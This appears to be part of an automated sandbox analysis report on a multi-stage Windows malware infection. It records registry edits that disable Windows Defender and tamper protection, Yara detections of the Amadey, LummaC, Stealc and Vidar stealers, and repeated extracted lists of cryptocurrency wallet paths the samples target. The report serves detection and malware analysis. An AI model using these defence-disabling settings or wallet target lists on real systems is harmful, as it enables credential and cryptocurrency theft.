Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F1CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00F1CBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_009465E0 LookupAccountNameA,

6_2_009465E0

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: BitLockerToGo.exe, 00000015.00000003.2925181917.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: 0d287ea527.exe, 0d287ea527.exe, 00000009.00000003.2825831566.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2852947773.0000000000760000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2829126321.000000000076E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r\MsMpeng.exe
Source: 0d287ea527.exe, 00000009.00000003.2637989954.000000000076D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2855995666.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match	File source: 00000023.00000002.2968432437.0000000001588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2f0cb7128a.exe PID: 8184, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 10.2.c4df60870c.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.c4df60870c.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.0d287ea527.exe.6160000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.2593195591.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2958992788.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2752270526.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3009795349.0000000006161000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2959179677.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c4df60870c.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: c4df60870c.exe PID: 3688, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0d287ea527.exe	String found in binary or memory: s/Electrum-LTC
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0d287ea527.exe	String found in binary or memory: Jaxx Liberty
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0d287ea527.exe	String found in binary or memory: Wallets/Exodus
